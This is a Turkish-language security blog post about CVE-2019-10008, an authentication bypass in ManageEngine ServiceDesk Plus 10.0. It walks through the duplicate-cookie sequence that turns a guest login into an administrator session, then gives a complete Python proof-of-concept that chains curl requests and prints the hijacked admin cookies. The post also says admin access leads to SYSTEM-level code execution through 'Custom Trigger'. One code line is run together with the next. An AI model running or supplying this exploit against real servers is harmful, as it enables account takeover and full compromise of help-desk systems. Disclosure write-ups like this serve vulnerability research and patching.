Ignis@blog:~$

ManageEngine ServiceDesk plus 10.0 Yetki Yükseltme

Bypassing Authentication

Guest to NT AUTHORITY/SYSTEM SHELL

Ata Hakçıl, Melih Kaan Yıldız

Overview

CVE-2019-10008 ServiceDesk Plus hizmetine istediğiniz kullanıcı olarak giriş yapabilmenizi sağlar. Platform, tuttuğu cookieler çok dikkatli ve spesifik bir şekilde manipule edilirse passwordünüzü kontrol etmez ve verdiğiniz username ile giriş yapmanızı sağlar.

En üst tabakadan baktığınızda aslında anlatması o kadar da zor değil.

İlgilendiğimiz 2 tane cookie değeri var, JSESSIONID ve JSESSIONIDSSO.

Anlayabildiğim kadarıyla, problem mobile container’ın ve asıl sitenin authenticationları farklı tutmasından kaynaklanıyor. Aşağıda hem adım adım yapılması gerekeni anlatacağım, hem de exploit kodunu paylaşacağım.

Öncelikle, aynı isimli cookieden duplicate’lar yollamamız gerekiyor, ve python requests cookie leri dictionary olarak tuttuğu için bunu desteklemiyor. Bu nedenle curl kullanacağız… Örnek olarak, eğer JSESSIONID cookiesinden 5 farklı değer var ise, bunları JSESSIONID[0] - JSESSIONID[4] olarak adlandıracağız. Ayrıca iki farklı JSESSIONIDSSO cookie’miz olacak, bunlar da JSESSSIONIDSSO[0] ve [1].

“+” demek ilgilenmediğimiz ve birlikte gelen tüm cookieler demek. Bunlara örnek olarak _rem cookiesi verilebilir, ne yaptığını bilmesem de gerek varmış.Buna ek olarak 2 cookie daha var, pek bunlara kafa yormamak lazım, sonra sıyırırsınız.

1) Session cookie olmadan anasayfaya get request. Bu bize header olara Set-Cookie JSESSION[0] gönderecek.

2) Logine JSESSION[0] ile post request. Bu herhangi bir response göndermeden homepage e redirect edecek.

3) Anasayfaya JSESSION[0] ile get request. Bu bize header olarak Set-Cookie JSESSION[1] ve JSESSIONSSO[0] gönderecek ve düşük yetki ile giriş yapmış olacağız.

4) /mc/ ye JSESSIONID[1] ve JSESSIONIDSSO[0]. Bu bize JSESSIONID[2] gönderecek *.

5) /mc/logout a JSESSIONID[2], JSESSIONID[1] ve JSESSIONIDSSO[0] ile get request. Bu bizim mc den gelen ve herhangi bir loginli session ile ilişkili olmayan cookie mizi logout etmek isteyecek, fakat session taşıyan JSESSIONID[1] aynı şekilde kalacak.

6) Aynı cookieler ile /mc/dashboard a get request. Bu bize sihirli olan “Set-Cookies for JSESSIONID[3] ve JSESSIONIDSSO[0]” ekibini yollayacak. Bu noktada, mobil session’ımız JSESSION[2] logout edip JSESSION[3]-JSESSIONSSO[0] ile değiştirildi, fakat JSESSION[1]-JSESSIONSSO[0] halen ilk verdiğimiz düşük yetkili hesapla ilişkili, ve loginli.

7) Anasayfaya get request. Bu bize JSESSIONID[4]-JSESSIONIDSSO[0] çiftini gönderecek.

8) /mc/login’e JSESSIONID[4], JSESSIONID[3] ve JSESSIONIDSSO[0] ile post request. Bu adım JSESSIONID[4]-JSESSIONIDSSO[0] çiftini password kontrol etmeden loginleyecek, ve anasayfaya yönlendirip JSESSIONID[5]-JSESSIONIDSSO[1] çiftini verecek. Bu pair kullanılarak yüksek yetkili kullanıcıya giriş yapılabilir.

Özet

Herhangi bir isim-şifre ikilisi biliyorsanız, istediğiniz herhangi bir hesap olarak giriş yapabilirsiniz. Eğer yüksek yetkili bir hesabı ele geçirirseniz, “Custom Trigger” panelini kullanarak makine üzerinde NT AUTHORITY/SYSTEM olarak kod çalıştırabilirsiniz.

You can get from a guest on the website to NT AUTHORITY/SYSTEM on the server.

POC video

POC code (Videodaki ile aynı kod)

import os
import re


##Host ip address + port
host="localhost:8080"

##set to https if needed
url = "http://" + host

##Username with credentials you have
low_username="guest"
low_password="guest"

##username you want to login as
high_username="administrator"

print("\033[1;37mUrl: \033[1;32m" + url)
print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password)
print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username)


print("\033[1;32mGetting a session id\033[1;37m")

## Get index page to capture a session id
curl = "curl -i -s -k -X $'GET' \
  -H $'Host: "+host+"' -H $'Referer: "+url+"/' -H $'Connection: close'\
  $'"+url+"/'"

out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]

print("Sessid:")
print(sessid)


print("\033[1;31mLogging in with low privilege user\033[1;37m")


##Attempt login post request 
curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\
 -H $'Referer: "+url+"/'\
 -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
 -b $'JSESSIONID="+sessid+"' \
 --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\
 hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\
 dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \
 $'"+url+"/j_security_check'"

out = os.popen('/bin/bash -c "' + curl+'"').read()


##Instead of following redirects with -L, following manually because we don't need all the transactions.
curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\
 -H $'Referer: "+url+"/'\
 -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
 -b $'JSESSIONID="+sessid+"' \
 $'"+url+"/'"

out = os.popen('/bin/bash -c "' + curl+'"').read()

print("\033[1;32mCaptured authenticated cookies.\033[1;37m")
sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
print(sessid)
sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
print(sessidsso)
grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out)

grbl2 = []
for cookie in grbl:
	cl = cookie.split('=')
	if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem':

		grbl2.append(cl[0])
		grbl2.append(cl[1])

curl = "curl -i -s -k -X $'GET' \
  -H $'Host: "+host+"' \
  -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
  -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
  $'"+url+"/mc/'"


out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]

print("\033[1;32mCaptured secondary sessid.\033[1;37m")
print(sessid2)


print("\033[1;31mDoing the magic step 1.\033[1;37m")
curl = "curl -i -s -k -X $'GET' \
  -H $'Host: "+host+"' \
	-H $'Referer: "+url+"/mc/WOListView.do' \
	-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
	-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
	$'"+url+"/mc/jsp/MCLogOut.jsp'"

out = os.popen('/bin/bash -c "' + curl+'"').read()

print("\033[1;31mDoing the magic step 2.\033[1;37m")
curl = "curl -i -s -k -X $'GET' \
  -H $'Host: "+host+"' \
  -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
  -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
  $'"+url+"/mc/jsp/MCDashboard.jsp'"


out = os.popen('/bin/bash -c "' + curl+'"').read()

sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]


curl = "curl -i -s -k -X $'GET' \
  -H $'Host: "+host+"' \
  -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
  -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
  $'"+url+"/'"

out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]


curl = "curl -i -s -k -X $'POST' \
  -H $'"+host+"' \
  -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
  -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
  -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
  --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \
  $'"+url+"/mc/j_security_check'"


out = os.popen('/bin/bash -c "' + curl+'"').read()

curl = "curl -i -s -k -X $'GET' \
  -H $'Host: "+host+"' \
  -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
  -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
  -H $'Upgrade-Insecure-Requests: 1' \
  -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
  $'"+url+"/mc/jsp/MCDashboard.jsp'"out = os.popen('/bin/bash -c "' + curl+'"').read()


sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]

print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m")
print("JSESSIONID=" + sessidhigh)
print("JSESSIONIDSSO=" + sessidssohigh)
print(grbl2[0] + "=" + grbl2[1])
print(grbl2[2] + "=" + grbl2[3])
print("_rem=true")